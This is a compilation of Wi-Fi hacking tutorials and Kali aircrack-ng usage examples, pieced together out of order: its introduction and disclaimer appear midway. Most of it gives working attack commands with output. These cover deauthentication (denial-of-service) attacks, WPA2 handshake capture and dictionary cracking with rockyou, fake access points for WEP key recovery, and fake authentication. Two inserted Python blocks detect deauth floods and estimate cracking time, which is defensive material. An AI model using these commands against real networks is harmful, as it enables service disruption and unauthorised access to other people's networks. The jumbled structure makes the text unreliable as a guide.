What we want to capture is a device successfully connecting to the network. We call this the handshake. The best way for us to accomplish this is to run an attack against the connected device and kick it from the network. It will attempt to reconnect, allowing us to capture the handshake.
In a new terminal, we will run Aireplay-NG using the following flags:
- --deauth (we will use the number zero, which means keep attacking until we say stop)
- -a
- -c
And then list the interface.
aireplay-ng --deauth 0 -a EC:AD:E0:AB:93:34 -c F2:98:XX:XX:XX:XX wlan0mon
After letting this run for a while, hit ctrl+c to stop the attack. In roughly 10 seconds, we had enough information in the capture to start cracking. You can also stop the packet capture in the other terminal window now.
You can see all the files that were saved. The *.cap file is the one we need.
Cracking the Password
We will use the program aircrack-ng to run a dictionary attack against the captured handshake and try to break the password. We are using the fern-wifi common password file, as mentioned earlier.
The command is:
aircrack-ng HackDump-01.cap -w /usr/share/wordlists/fern-wifi/common.txt
The cracking attempts begin. We already know the password was in this list. In under one second, Aircrack-NG tried 400 passwords and found the correct one. We now have access to this network.
airodump-ng Usage Examples
Monitor all wireless networks, frequency hopping between all wireless channels.
root@kali:~# airodump-ng wlan0mon
 CH  8 ][ Elapsed: 4 s ][ 2018-11-22 13:44
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 54:A0:50:DA:7B:98  -76        1        0    0   1  54e  WPA2 CCMP   PSK  RTINC-24
 FC:15:B4:CF:0A:55  -70        2        0    0   6  54e. WPA2 CCMP   PSK  HP-Print-55-ENVY 4500 series
 A8:4E:3F:73:DD:88  -67        3        0    0   6  720  WPA2 CCMP   PSK  WAT-73DD80
 4C:8B:30:83:ED:91  -71        2        0    0   1  54e  WPA2 CCMP   PSK  TELL-US-2.4G
 4C:8B:30:D7:09:41  -76        2        0    0   1  54e  WPA2 CCMP   PSK  SAMUELL-2.4G
 FA:8F:CA:89:90:39  -82        2        0    0   1  135  OPN              Raymond's TV.e102
 AC:20:2E:CD:F4:88  -85        0        0    0   6  54e. WPA2 CCMP   PSK  BELL-CDF480
 10:78:5B:2A:A1:21  -80        2        0    0   6  54e  WPA2 CCMP   PSK  COGECO-2.4G
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 (not associated)   8C:85:90:0C:C5:D0  -44    0 - 1      1         5
 (not associated)   A0:63:91:43:C2:D5  -70    0 - 1      0         1  TT-D59979
 (not associated)   14:91:82:04:D9:74  -43    0 - 1      0         1  1
Sniff on channel 6 (-c 6) via monitor mode interface wlan0mon and save the capture to a file (-w /root/chan6).
root@kali:~# airodump-ng -c 6 -w /root/chan6 wlan0mon
 CH  6 ][ Elapsed: 8 s ][ 2017-11-12 13:49
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 BC:4D:FB:2C:6D:88  -68  28        9        3    0   6  54e. WPA2 CCMP   PSK  BELL-CDF4800
 A8:4E:3F:73:DD:88  -74  33       19        0    0   6  54e. WPA2 CCMP   PSK  COGECO-2.4G
 FC:15:B4:CF:0A:55  -77  61       31        0    0   6  54e. WPA2 CCMP   PSK  HP-Print-55-ENVY 4500 series
Filter for access points by a specific manufacturer, specifying the OUI and mask (-d FC:15:B4:00:00:00 -m FF:FF:FF:00:00:00).
root@kali:~# airodump-ng -d FC:15:B4:00:00:00 -m FF:FF:FF:00:00:00 wlan0mon
 CH 14 ][ Elapsed: 18 s ][ 2018-11-22 13:53
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 FC:15:B4:CF:0A:55  -76        9        0    0   6  54e. WPA2 CCMP   PSK  HP-Print-55-ENVY 4500 series
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
How to Crack WPA2
Wi-Fi can use a number of various protocols to give you a secure internet connection. From the least to most secure, they are:
- Open
- WEP (Wired Equivalent Privacy)
- WPA2 (Wi-Fi Protected Access 2)
- WPA3 (Wi-Fi Protected Access 3)
An open network is pretty much as the name implies – open. It has no password and practically anyone can connect to it.
WEP is an old protocol, rarely in use and requires a password like its successors.
WPA2 is the most commonly used protocol around the world. WPA3 is the newest and most secure protocol to date, but it is rarely used and only available on newer devices.
Prerequisites
Wi-Fi works by constantly sending packets of data to your authenticated device. In order to hack it, you’ll need:
- A Linux machine (Preferably Kali Linux)
- A wireless adapter
To install Kali from scratch, you can follow this tutorial.
If you haven’t already, you’ll need to install a tool called Aircrack-ng on your machine. To install it, just type in the command below.
sudo apt install aircrack-ng
How to Put the Network Card into Monitor Mode
You first want to get information about the target. This is what hackers call reconnaissance.
In order to do that you need to first change your wireless card from ‘managed’ mode to ‘monitor’ mode. This will turn it from a mere network card to a wireless network reader.
First you need to find out the name of your wireless card. Plug in your adapter and run the iwconfig command to find out. It’s usually the last one on the list.
As you can see, mine is wlan1. Now run the following commands:
sudo airmon-ng check rfkill
sudo airmon-ng start <interface>
sudo indicates the need for root privileges, check rfkill stops processes that could hinder the card from going into monitor mode, and start tells airmon-ng which network card to execute on. Replace <interface> with the name of your wireless card.
airmon-ng is a script that instantly changes your card to monitor mode. You actually can do this manually or make a script of your own but I personally prefer something rather simple.
How to Look for the Target
To see what networks are around you, run the following command:
sudo airodump-ng <interface>
airodump-ng is a part of the aircrack-ng suite that allows a network card to view the wireless traffic around it.
As you can see we get a lot of information. But let’s take a quick look at the ESSID (Extended Service Set Identifier) column. Also known as the AP (Access Point) name, this column shows the name of the target network, which in my case will be ‘Asteroid’.
You want to concentrate on the target AP and ignore the rest. To do this, press Ctrl+C to cancel the current scan and this time, append the bssid of the network with the bssid flag as shown below.
sudo airodump-ng --bssid <bssid> <interface>
The BSSID stands for Basic Service Set Identifier, a fancy name for the MAC address of the device. You use it to identify the device on a network, along with the ESSID (name of the AP). Technically, you could just use the ESSID flag instead, but different APs could have the same name. However, no two APs can ever have the same BSSID.
Below is a code snippet of what you would type to get info about the AP using the ESSID only.
sudo airodump-ng --essid <essid> <interface>
Note: If the name has a space, enclose it with quotes. For example, --essid “Asteroid 1”.
You’ll notice I highlighted the MAC address of a client connected to the AP under the ‘Station’ column. To its left is the MAC address of the AP it is connected to.
How to Capture the Handshake Packets
The next step is to capture the handshake packets (Remember packets? 👀). Handshake packets are the first four packets sent from the AP when an authenticated device connects to an AP.
This means we have two options:
- Wait for a device to connect to the AP
- De-authenticate the device and then let it connect to the AP
The second one sounds a lot more fun so let’s go for it.
How to Perform a DOS Attack
You can use aireplay-ng or mdk4 to disconnect devices from APs for a time. This is called a de-authentication attack or a wireless DOS (Denial-Of-Service) attack.
Now here’s the game plan:
- Setup airodump-ng to capture packets and save them
- De-authenticate the device for some time while airodump-ng is running
- Capture the handshake
Got all that? Good. Let’s roll. 👨💻👩💻
First, run the command to capture and save packets:
sudo airodump-ng -c <channel> --bssid <bssid> -w <path> <interface>
Here, we’re using the -c flag to specify the channel to search, the --bssid flag for the MAC address of the AP, and the -w flag to give a path you want to save the captured packets to.
Quick lesson: Channels reduce the chances of APs interfering with each other. When running airodump-ng, you can identify the channel number under the CH column.
While that is running, you’re going to run your de-authentication attack against the device connected to it using the command:
sudo aireplay-ng -a <bssid> --deauth <number> <interface>
The -a flag specifies the MAC address of the AP, --deauth specifies how long you want the attack to run in seconds, followed up by the network card.
A de-authentication attack involves using your own network card to send packets to interrupt communication between the AP and the client. It’s not perfect and sometimes the client may connect back, but only for a short time.
If your Wi-Fi is acting crazy and you seem to be disconnecting and connecting randomly back to it, you may be experiencing a de-authentication attack.
In the command above, you’re targeting the AP and running the attack. Note that you can instead attack any device connected to the AP and you should get the same result. All you need to do is to change the -a flag to the MAC address of any device connected.
While the DOS attack is underway, check on your airodump scan. You should see WPA handshake: at the top right. Once you have verified that, you can stop the replay attack and the airodump-ng scan.
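The symptom described above (a client that keeps dropping off and reconnecting) is something the network owner can check for from a monitor-mode capture. The Python below is an added example, not part of the original article: it parses raw 802.11 management frames (no radiotap header assumed) and raises an alert when more than ten deauthentication or disassociation frames for one BSSID arrive within a one-second sliding window; the MAC addresses, frames and timestamps are constructed here, and the 64-frame burst mirrors the "Sending 64 directed DeAuth" lines in the aireplay-ng output on this page.

```python
import struct
from collections import defaultdict, deque

# 802.11 frame control byte 0: bits 0-1 version, bits 2-3 type, bits 4-7 subtype.
TYPE_MANAGEMENT = 0
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C


def mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)


def parse_deauth(frame):
    """Return (subtype, dst, src, bssid, reason_code) for a deauth/disassoc frame,
    or None for any other frame. Expects a raw 802.11 frame with no radiotap header."""
    if len(frame) < 26:          # 24-byte management header + 2-byte reason code
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, (fc0 >> 4) & 0x0F
    if version != 0 or ftype != TYPE_MANAGEMENT or subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = struct.unpack_from("<H", frame, 24)[0]   # body starts right after the header
    return subtype, mac_str(dst), mac_str(src), mac_str(bssid), reason


def detect_deauth_flood(capture, window_s=1.0, threshold=10):
    """capture: time-ordered (timestamp_seconds, raw_frame) pairs.
    Emits one alert per BSSID the first time more than `threshold` deauth/disassoc
    frames for that BSSID fall inside a sliding window of `window_s` seconds."""
    recent = defaultdict(deque)      # bssid -> deque of (timestamp, reason_code)
    alerted, alerts = set(), []
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        _, _, _, bssid, reason = parsed
        window = recent[bssid]
        window.append((ts, reason))
        while ts - window[0][0] > window_s:   # drop frames older than the window
            window.popleft()
        if len(window) > threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "first_seen": window[0][0], "last_seen": ts,
                           "count": len(window), "reason_codes": sorted({r for _, r in window})})
    return alerts


# Constructed sample frames: locally administered MACs, not real devices.
AP, CLIENT = "0200000000AA", "020000000001"
BEACON = bytes.fromhex("8000 0000 ffffffffffff" + AP + AP + "0000" + "00" * 8 + "6400 1104")
# Reason 3 = "sending STA is leaving": a single one of these is normal roaming behaviour.
DEAUTH_LEAVING = bytes.fromhex("c000 3a01" + CLIENT + AP + AP + "0000 0300")
# Reason 7 = "class 3 frame received from nonassociated STA".
DEAUTH_CLASS3 = bytes.fromhex("c000 3a01" + CLIENT + AP + AP + "0000 0700")


def make_sample_capture():
    """Beacons every 0.1 s, one ordinary deauth at t=0.2 s, then a burst of 64 deauth
    frames within 0.32 s starting at t=2.0 s (constructed sample, not a real capture)."""
    capture = [(i / 10, BEACON) for i in range(30)]
    capture.append((0.2, DEAUTH_LEAVING))
    capture += [(2.0 + i * 0.005, DEAUTH_CLASS3) for i in range(64)]
    return sorted(capture, key=lambda item: item[0])


if __name__ == "__main__":
    for alert in detect_deauth_flood(make_sample_capture()):
        print(f"deauth flood against {alert['bssid']}: {alert['count']} frames in "
              f"{alert['last_seen'] - alert['first_seen']:.3f} s, reason codes {alert['reason_codes']}")
```

The single reason-3 deauth does not trip the detector; only the burst does, which is the distinction a wireless IDS needs to avoid alerting on normal roaming.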
How to Obtain the Password (Hopefully)
In the final steps, you are going to run a bunch of generated Pairwise Master Keys (PMKs) against the captured packets to get the password. Let me break it down.
A PMK is basically an algorithmic combination of a word and the AP’s name. Our intention is to continuously generate PMKs using a wordlist against the handshake. If the PMK is valid, the word used to generate it is the password. If the PMK is not valid, it skips to the next word on the list.
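An added illustration, not from the original article, of what the PMK is and why each guess has a cost: WPA2-Personal derives the PMK as PBKDF2-HMAC-SHA1 over the passphrase and the SSID with 4096 iterations, so every word in a wordlist costs 4096 HMAC rounds, which is why aircrack-ng reports keys per second. The code computes the PMK (checked against the IEEE 802.11i test vector, passphrase "password" with SSID "IEEE") and reuses the 2400 keys/s measured in the earlier section to turn a passphrase policy into a worst-case search time, the figure a network owner needs when choosing a policy; the policy names and the rate parameter are assumptions for the illustration.

```python
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-Personal
PMK_LEN = 32               # the PMK is 256 bits


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Both a joining station and every dictionary guess must repeat this work."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-Personal passphrases are 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def exhaustive_search_hours(charset_size, length, keys_per_second=2400):
    """Worst-case hours to try every passphrase of exactly `length` characters drawn
    from `charset_size` symbols, at the rate reported earlier on this page (assumed default)."""
    return charset_size ** length / keys_per_second / 3600


def policy_exposure(keys_per_second=2400):
    """Worst-case search hours for a few passphrase policies, starting with the
    8-digit cafe password from the earlier section (policy names are constructed)."""
    policies = {
        "8 digits": (10, 8),
        "8 lowercase letters": (26, 8),
        "8 letters and digits": (62, 8),
        "12 letters and digits": (62, 12),
    }
    return {name: exhaustive_search_hours(size, length, keys_per_second)
            for name, (size, length) in policies.items()}


if __name__ == "__main__":
    print("PMK for the 802.11i test vector:", derive_pmk("password", "IEEE").hex())
    for name, hours in policy_exposure().items():
        print(f"{name:>22}: {hours:,.0f} hours worst case")
```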
I’m going to use the rockyou wordlist located in the /usr/share/wordlists directory. I think this is only found in Kali so if you have a different OS, you might make one of your own manually or generate one using crunch.
If it isn’t already extracted, just run the command:
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
Quick history lesson: The rockyou wordlist is a bunch of passwords gotten from one of the most infamous cybersecurity data breaches that affected a company of the same name. It contains approximately 14 million unique passwords that were used in over 32 million accounts and as such, is one of the most dependable wordlists on the planet.
Now run the command:
sudo aircrack-ng <capture file> -w <wordlist>
Alright, everyone – mission accomplished 😎.
The password was, well… ‘password’. Pretty disappointing from a security perspective, but I set this network up just for fun for the purposes of this tutorial. In reality, this could take minutes to hours depending on the length and strength of the password.
To clean up, simply remove the file captures, close your terminals, and run the command
service NetworkManager restart
to change your network card back to managed mode so you can connect to the Wi-Fi.
wpaclean Usage Example
Parse the provided capture files (wpa-psk-linksys.cap wpa.cap) and save any 4-way handshakes to a new file (/root/handshakes.cap):
root@kali:/usr/share/doc/aircrack-ng/examples# wpaclean /root/handshakes.cap wpa-psk-linksys.cap wpa.cap
Pwning wpa-psk-linksys.cap (1/2 50%)
Net 00:0b:86:c2:a4:85 linksys
Pwning wpa.cap (2/2 100%)
Net 00:0d:93:eb:b0:8c test
Done
Conclusion
This example was under ideal conditions. We knew the password was on our short list. In real life, you will likely be building your own password lists based on what you know of the target. You may also need to take other measures, such as spoofing your MAC Address to bypass whitelisting.
Still, this exercise proves that wireless networks are only as secure as the passwords you choose. Even with very secure passwords, other ways exist to infiltrate a network. We didn’t touch on hacking WPS, which can be a quicker method to gain access, or setting up an evil twin to try and social engineer credentials.
There are many different methods to hack WiFi, and we encourage you to test out different methods and programs. Check out our Member Section to see all our course offerings. You might especially like the ones below.
Welcome to the world of Wi-Fi hacking, everybody. 💻.
In my previous article, we talked about some basic Linux skills and tricks. In this article you are going to learn a basic Wi-Fi hacking procedure using those skills.
You’ll learn things such as how to:
- Monitor Wi-Fi networks around you
- Perform a DOS attack
- Protect yourself against Wi-Fi attacks
Disclaimer: This is strictly for educational purposes only (and, of course, for a little fun). Do not under any circumstances, conditions, or influence of unwise friends use the hacks you learn here on organisations, individuals, or your probably annoying neighbour. You would be committing a crime and you’ll either be fined, sent to jail, or just get your parents embarrassed.
And now that we have that lovely introduction out of the way, let’s proceed.🙃
ivstools Usage Examples
Strip out the initialization vectors of the provided .pcap capture and save them to a new file:
root@kali:~# ivstools --convert wep_64_ptw.cap out.ivs
Opening wep_64_ptw.cap
Creating out.ivs
Read 65282 packets.
Written 30566 IVs.
Merge all .ivs files into one file:
root@kali:~# ivstools --merge *.ivs /root/all-ivs.ivs
Creating /root/all-ivs.ivs
Opening out.ivs
916996 bytes written
Opening out2.ivs
1374748 bytes written
easside-ng Usage Example
First, run buddy-ng, then launch the Easside-ng attack, specifying as many of the options as you can.
root@kali:~# buddy-ng
Waiting for connexion
root@kali:~# easside-ng -v de:ad:be:ef:ca:fe -m 3c:46:d8:4e:ef:aa -s 127.0.0.1 -f wlan0mon -c 6
Setting tap MTU
Sorting out wifi MAC
makeivs-ng Usage Example
Specify a BSSID (-b de:ad:be:ef:ca:fe), WEP key (-k 123456789ABCDEF123456789AB), and output filename (-w makeivs.ivs):
root@kali:~# makeivs-ng -b de:ad:be:ef:ca:fe -k 123456789ABCDEF123456789AB -w makeivs.ivs
Creating 100000 IVs with 16 bytes of keystream each.
Estimated filesize: 2.29 MB
Using fake BSSID DE:AD:BE:EF:CA:FE
Done.
root@kali:~# aircrack-ng makeivs.ivs
Opening makeivs.ivs
Read 100001 packets.
   #  BSSID              ESSID                     Encryption
   1  DE:AD:BE:EF:CA:FE                            WEP (100000 IVs)
Choosing first network as target.
Opening makeivs.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 100000 ivs.
                                 Aircrack-ng 1.2 rc4
                 [00:00:00] Tested 621 keys (got 100000 IVs)
   KB    depth   byte(vote)
    0    1/  2   76(113152) 1E(111104) 48(109824) 1C(109568) A6(109568)
    1    1/  3   F5(112640) 06(111616) 33(111616) F4(111616) 05(111104)
    2    0/  2   31(137216) F9(113664) 76(113152) DC(110336) B9(109568)
    3   10/  3   E1(108800) 0A(108544) 34(108032) 3E(108032) 48(108032)
    4    9/  4   7D(109312) BA(109056) 5E(108800) D6(108800) 11(108288)
             KEY FOUND! [ 12:34:56:78:9A:BC:DE:F1:23:45:67:89:AB ]
        Decrypted correctly: 100%
Introduction
Wireless Fidelity (Wi-Fi) is a common technology many of us use in our daily lives. Whether it’s at school, at home, or simply bingeing Netflix, it’s increasingly rare to see anyone carry out Internet-related activities without it.
But have you ever tried to hack Wi-Fi? 🤔 (I’m sure you’ve been tempted 😏).
In order to hack something, you need to know how it works. This means you need to understand how the tech works in the first place. So let’s start from the basics: The Packet.
airserv-ng Usage Example
Start a server instance on a specific port (-p 4444) using the wlan0mon interface on channel 6 (-c 6).
root@kali:~# airserv-ng -p 4444 -d wlan0mon -c 6
Opening card wlan0mon
Setting chan 6
Opening sock port 4444
Serving wlan0mon chan 6 on port 4444
What We’ll Cover:
Here’s a basic rundown of what this tutorial contains:
- Introduction
- What is a Packet?
- How to Crack WPA2
- Prerequisites
- How to put the network card into monitor mode
- How to look for the target
- How to capture the handshake packets
- How to perform a DOS attack
- How to obtain the password (hopefully)
- Mitigations Against WiFi Attacks
- Conclusion
airbase-ng Usage Examples
Hirte Attack – Access Point Mode
The Hirte attack attempts to retrieve a WEP key via a client. This example creates an access point on channel 6 (-c 6) with the specified ESSID (-e TotallyNotATrap) and uses the cfrag WEP attack (-N), setting the WEP flag in the beacons (-W 1).
root@kali:~# airbase-ng -c 6 -e TotallyNotATrap -N -W 1 wlan0mon
15:51:11  Created tap interface at0
15:51:11  Trying to set MTU on at0 to 1500
15:51:11  Trying to set MTU on wlan0mon to 1800
15:51:11  Access Point with BSSID 3C:46:D8:4E:EF:AA started.
Caffe Latte Attack – Access Point Mode
As with the Hirte attack, the Caffe Latte Attack attempts to retrieve a WEP key via a client. This example creates an access point on channel 6 (-c 6) with the specified ESSID (-e AlsoNotATrap) and uses the Caffe Latte WEP attack (-L), setting the WEP flag in the beacons (-W 1).
root@kali:~# airbase-ng -c 6 -e AlsoNotATrap -L -W 1 wlan0mon
15:56:05  Created tap interface at0
15:56:05  Trying to set MTU on at0 to 1500
15:56:05  Access Point with BSSID 3C:46:D8:4E:EF:AA started.
aireplay-ng Usage Examples
Injection Test
Run the injection test (-9) via the monitor mode interface wlan0mon.
root@kali:~# aireplay-ng -9 wlan0mon
22:55:44  Trying broadcast probe requests...
22:55:44  Injection is working!
22:55:46  Found 4 APs
22:55:46  Trying directed probe requests...
22:55:46  24:FB:95:FD:3D:7F - channel: 6 - 'America'
22:55:52  30/30: 100%
22:55:52  34:6D:A0:CD:45:10 - channel: 6 - 'ATT2b8i4UD'
22:55:58  27/30:  90%
22:55:58  50:64:3D:2A:F7:A0 - channel: 6 - 'FBI surveillance van'
22:56:04  12/30:  40%
22:56:04  16:6E:EF:29:67:46 - channel: 6 - 'dd-wrt_vap'
22:56:10   1/30:   3%
Deauthentication Attack
Run the deauthentication attack (-0), sending packets to the wireless access point (-a 8C:7F:3B:7E:81:B6) to deauthenticate a wireless client (-c 00:08:22:B9:41:A1) via the monitor mode interface wlan0mon.
root@kali:~# aireplay-ng -0 5 -a 8C:7F:3B:7E:81:B6 -c 00:08:22:B9:41:A1 wlan0mon
12:41:56  Waiting for beacon frame (BSSID: 8C:7F:3B:7E:81:B6) on channel 6
12:41:57  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:59  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:42:00  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
Fake Authentication
Run the fake authentication attack and re-authenticate every 6000 seconds (-1 6000) against the access point (-a F0:F2:49:82:DF:3B) with the given ESSID (-e FBI-Van-24), specifying our MAC address (-h 3c:46:d8:4e:ef:aa), using monitor mode interface wlan0mon.
root@kali:~# aireplay-ng -1 6000 -e FBI-Van-24 -a F0:F2:49:82:DF:3B -h 3c:46:d8:4e:ef:aa wlan0mon
12:49:59  Waiting for beacon frame (BSSID: F0:F2:49:82:DF:3B) on channel 6
12:50:06  Sending Authentication Request (Open System)